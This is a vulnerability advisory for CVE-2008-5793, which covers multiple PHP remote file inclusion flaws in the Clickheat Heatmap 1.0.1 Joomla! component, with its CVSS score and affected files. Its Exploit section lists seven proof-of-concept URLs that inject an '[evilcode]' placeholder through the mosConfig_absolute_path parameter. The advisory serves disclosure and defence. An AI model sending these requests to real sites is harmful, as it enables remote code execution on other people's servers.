CVE-2008-5793 - Code Injection vulnerability in Recly Clickheat Heatmap 1.0.1

Publication

2008-12-31

Last modification

2017-09-29

Summary

Multiple PHP remote file inclusion vulnerabilities in the Clickheat - Heatmap stats (com_clickheat) component 1.0.1 for Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the (1) GLOBALS[mosConfig_absolute_path] parameter to (a) install.clickheat.php, (b) Cache.php and (c) Clickheat_Heatmap.php in Recly/Clickheat/, and (d) Recly/common/GlobalVariables.php; and the (2) mosConfig_absolute_path parameter to (e) _main.php and (f) main.php in includes/heatmap, and (g) includes/overview/main.php.

Description

Clickheat is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.Clickheat 1.0.1 is vulnerable; other versions may also be affected.

Solution

Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: info@vumetric.com.

Exploit

An attacker can exploit these issues via a browser.The following proof-of-concept URIs are available:http://www.example.com /[path]/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=[evilcode]http://www.example.com /[path]/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=[evilcode]http://www.example.com /[path]/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=[evilcode]http://www.example.com /[path]/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=[evilcode]http://www.example.com /[path]/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=[evilcode]http://www.example.com /[path]/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=[evilcode]http://www.example.com /[path]/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=[evilcode]

Classification

CWE-94 - Code Injection

Risk level (CVSS AV:N/AC:M/Au:N/C:P/I:P/A:P)

Medium

6.8

Access Vector

  • Network
  • Adjacent Network
  • Local

Access Complexity

  • Low
  • Medium
  • High

Authentication

  • None
  • Single
  • Multiple

Confident. Impact

  • Complete
  • Partial
  • None

Integrity Impact

  • Complete
  • Partial
  • None

Affected Products

Vendor Product Versions
Recly Clickheat Heatmap  1.0.1